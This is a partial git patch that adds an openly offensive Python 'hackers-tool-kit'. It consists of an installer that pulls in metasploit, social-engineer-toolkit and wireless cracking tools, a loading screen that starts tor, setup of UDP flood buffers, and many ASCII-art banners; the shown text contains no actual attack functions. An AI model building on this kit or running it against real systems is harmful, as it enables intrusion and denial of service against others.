dnspython") - os.system("pip install shodan") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat -y") - os.system("apt install nc -y") - os.system("apt install neofetch -y") - os.system("apt install cupp -y") - os.system("gem install lolcat") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") -install() From fc4a0b76d76728785aeeaa61532d8cad6d3fca64 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 1 Dec 2019 04:55:23 +0000 Subject: [PATCH 200/214] Add files via upload --- htk.py | 3281 ++++++++++++++++++++++++++++++++++++++++++++++++++++ install.py | 63 + 2 files changed, 3344 insertions(+) create mode 100644 htk.py create mode 100644 install.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..c79adab --- /dev/null +++ b/htk.py @@ -0,0 +1,3281 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +import readline +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + 